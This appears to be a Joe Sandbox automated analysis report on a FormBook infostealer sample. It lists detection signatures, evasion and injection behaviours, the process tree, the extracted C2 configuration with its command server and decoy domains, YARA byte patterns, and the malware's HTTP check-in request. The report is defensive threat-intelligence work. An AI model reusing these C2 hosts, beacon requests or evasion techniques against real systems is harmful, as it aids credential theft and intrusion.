Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
n0srYVYMDI.exe

Overview

General Information

Sample name:n0srYVYMDI.exe
renamed because original name is a hash value
Original sample name:067d0a32b11208193e232f3b4d05b24f0d730ffb23049a1611be068738b9d11c.exe
Analysis ID:1587617
MD5:7d311cdceda373fd94310919b7bdc784
SHA1:9e1504e3148829775ef7d1c80095dda1fb725e73
SHA256:067d0a32b11208193e232f3b4d05b24f0d730ffb23049a1611be068738b9d11c
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • n0srYVYMDI.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\n0srYVYMDI.exe" MD5: 7D311CDCEDA373FD94310919B7BDC784)
    • n0srYVYMDI.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\n0srYVYMDI.exe" MD5: 7D311CDCEDA373FD94310919B7BDC784)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmd.exe (PID: 7796 cmdline: "C:\Windows\SysWOW64\cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • cmd.exe (PID: 7840 cmdline: /c del "C:\Users\user\Desktop\n0srYVYMDI.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ehills.shop/m25s/"], "decoy": ["araghospitality.net", "cleans.xyz", "olnacasinotcs14.top", "pringhillinfos.net", "erkakasrumah.online", "orean-course-289113002.zone", "yeloma-treatment-82106.bond", "76iw543gw.autos", "nline-shopping-56055.bond", "enetik.xyz", "ax-th-6011838.fyi", "itygatehousing.app", "23zy998jk.bond", "pslag-hal-2.online", "uykoii.shop", "9supjub3p.buzz", "tmgl.bond", "actus-catering-creations.net", "ntercashspace24.homes", "ierra777.vip", "ental-health-69511.bond", "newordforpurpose.info", "roppsple.shop", "edant.ltd", "imitake.xyz", "ransportationmwmptpro.top", "roncrow.biz", "armanshop.xyz", "ealthy-life-products.online", "raphic-design-degree-33148.bond", "ildcraft.xyz", "16-lawn-care.today", "7732.club", "vitor.live", "uy-smart-tv-nl.today", "sone.best", "ellcli.net", "52006.club", "abelzshop.online", "cctofi.cpa", "alisu.xyz", "roformance.shop", "cskuvq.shop", "anforexuytin.cfd", "raceg.cyou", "rimevest-global.info", "ealthcare-trends-60670.bond", "oo.bio", "itodemo.click", "ottah.studio", "teamgame-mod.net", "39474.club", "yai11.top", "onnorbell.design", "dt5r.shop", "6874.club", "wistlnc.net", "ntermoney24cad.homes", "attoomasteracademy.online", "3win4.cyou", "xewaov.xyz", "6uzh.digital", "ransportationwlsltpro.top", "oches-a-credito-es.bond"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 23 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.n0srYVYMDI.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.n0srYVYMDI.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.n0srYVYMDI.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          2.2.n0srYVYMDI.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.n0srYVYMDI.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18809:$sqlite3step: 68 34 1C 7B E1
          • 0x1891c:$sqlite3step: 68 34 1C 7B E1
          • 0x18838:$sqlite3text: 68 38 2A 90 C5
          • 0x1895d:$sqlite3text: 68 38 2A 90 C5
          • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-10T15:51:40.551018+010020314531Malware Command and Control Activity Detected192.168.2.450007103.224.212.21380TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: n0srYVYMDI.exeAvira: detected
          Found malware configuration
          Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.ehills.shop/m25s/"], "decoy": ["araghospitality.net", "cleans.xyz", "olnacasinotcs14.top", "pringhillinfos.net", "erkakasrumah.online", "orean-course-289113002.zone", "yeloma-treatment-82106.bond", "76iw543gw.autos", "nline-shopping-56055.bond", "enetik.xyz", "ax-th-6011838.fyi", "itygatehousing.app", "23zy998jk.bond", "pslag-hal-2.online", "uykoii.shop", "9supjub3p.buzz", "tmgl.bond", "actus-catering-creations.net", "ntercashspace24.homes", "ierra777.vip", "ental-health-69511.bond", "newordforpurpose.info", "roppsple.shop", "edant.ltd", "imitake.xyz", "ransportationmwmptpro.top", "roncrow.biz", "armanshop.xyz", "ealthy-life-products.online", "raphic-design-degree-33148.bond", "ildcraft.xyz", "16-lawn-care.today", "7732.club", "vitor.live", "uy-smart-tv-nl.today", "sone.best", "ellcli.net", "52006.club", "abelzshop.online", "cctofi.cpa", "alisu.xyz", "roformance.shop", "cskuvq.shop", "anforexuytin.cfd", "raceg.cyou", "rimevest-global.info", "ealthcare-trends-60670.bond", "oo.bio", "itodemo.click", "ottah.studio", "teamgame-mod.net", "39474.club", "yai11.top", "onnorbell.design", "dt5r.shop", "6874.club", "wistlnc.net", "ntermoney24cad.homes", "attoomasteracademy.online", "3win4.cyou", "xewaov.xyz", "6uzh.digital", "ransportationwlsltpro.top", "oches-a-credito-es.bond"]}
          Multi AV Scanner detection for submitted file
          Source: n0srYVYMDI.exeVirustotal: Detection: 70%Perma Link
          Source: n0srYVYMDI.exeReversingLabs: Detection: 82%
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: n0srYVYMDI.exeJoe Sandbox ML: detected
          Source: n0srYVYMDI.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: n0srYVYMDI.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmd.pdbUGP source: n0srYVYMDI.exe, 00000002.00000002.1787623438.0000000001690000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: n0srYVYMDI.exe, 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1787115102.0000000003845000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1789350991.00000000039F4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: n0srYVYMDI.exe, n0srYVYMDI.exe, 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, cmd.exe, 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1787115102.0000000003845000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1789350991.00000000039F4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: n0srYVYMDI.exe, 00000002.00000002.1787623438.0000000001690000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, cmd.exe, 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0025589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,4_2_0025589A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00250207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,4_2_00250207
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00263E66 FindFirstFileW,FindNextFileW,FindClose,4_2_00263E66
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00254EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00254EC1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0024532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,4_2_0024532E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 4x nop then jmp 07D07B49h0_2_07D071F4
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 4x nop then jmp 07D07B49h0_2_07D0716B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 4x nop then pop ebx2_2_00407B1B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop ebx4_2_02F67B1B

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50007 -> 103.224.212.213:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50007 -> 103.224.212.213:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50007 -> 103.224.212.213:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.ehills.shop/m25s/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.armanshop.xyz
          Tries to resolve many domain names, but no domain seems valid
          Source: unknownDNS traffic detected: query: www.ransportationmwmptpro.top replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.uy-smart-tv-nl.today replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.ental-health-69511.bond replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.onnorbell.design replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.raceg.cyou replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.armanshop.xyz replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.wistlnc.net replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.cctofi.cpa replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.orean-course-289113002.zone replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.ealthcare-trends-60670.bond replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.ehills.shop replaycode: Name error (3)
          Source: global trafficHTTP traffic detected: GET /m25s/?RR=ejXsf9CDJtAn3y938lXanCHlJWOupDiK8G2VK70kBEvHSxoyO9pX1brU4xQC+L5tXqcG&2d2x=dTjPadN8ifyHSjI HTTP/1.1Host: www.vitor.liveConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 103.224.212.213 103.224.212.213
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 3_2_10DC3F82 getaddrinfo,setsockopt,recv,3_2_10DC3F82
          Source: global trafficHTTP traffic detected: GET /m25s/?RR=ejXsf9CDJtAn3y938lXanCHlJWOupDiK8G2VK70kBEvHSxoyO9pX1brU4xQC+L5tXqcG&2d2x=dTjPadN8ifyHSjI HTTP/1.1Host: www.vitor.liveConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.ealthcare-trends-60670.bond
          Source: global trafficDNS traffic detected: DNS query: www.ental-health-69511.bond
          Source: global trafficDNS traffic detected: DNS query: www.wistlnc.net
          Source: global trafficDNS traffic detected: DNS query: www.armanshop.xyz
          Source: global trafficDNS traffic detected: DNS query: www.ehills.shop
          Source: global trafficDNS traffic detected: DNS query: www.uy-smart-tv-nl.today
          Source: global trafficDNS traffic detected: DNS query: www.vitor.live
          Source: global trafficDNS traffic detected: DNS query: www.raceg.cyou
          Source: global trafficDNS traffic detected: DNS query: www.cctofi.cpa
          Source: global trafficDNS traffic detected: DNS query: www.onnorbell.design
          Source: global trafficDNS traffic detected: DNS query: www.orean-course-289113002.zone
          Source: global trafficDNS traffic detected: DNS query: www.ransportationmwmptpro.top
          Source: explorer.exe, 00000003.00000000.1732979117.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1728291050.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3107210219.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000003.00000000.1732979117.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1728291050.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3107210219.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000003.00000000.1732979117.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1728291050.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3107210219.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000003.00000000.1732979117.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1728291050.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3107210219.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000000.1728291050.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000002.4175505713.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4174803690.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4177373939.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.39474.club
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.39474.club/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.39474.club/m25s/www.oches-a-credito-es.bond
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.39474.clubReferer:
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.armanshop.xyz
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.armanshop.xyz/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.armanshop.xyz/m25s/www.ehills.shop
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.armanshop.xyzReferer:
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cctofi.cpa
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cctofi.cpa/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cctofi.cpa/m25s/www.onnorbell.design
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cctofi.cpaReferer:
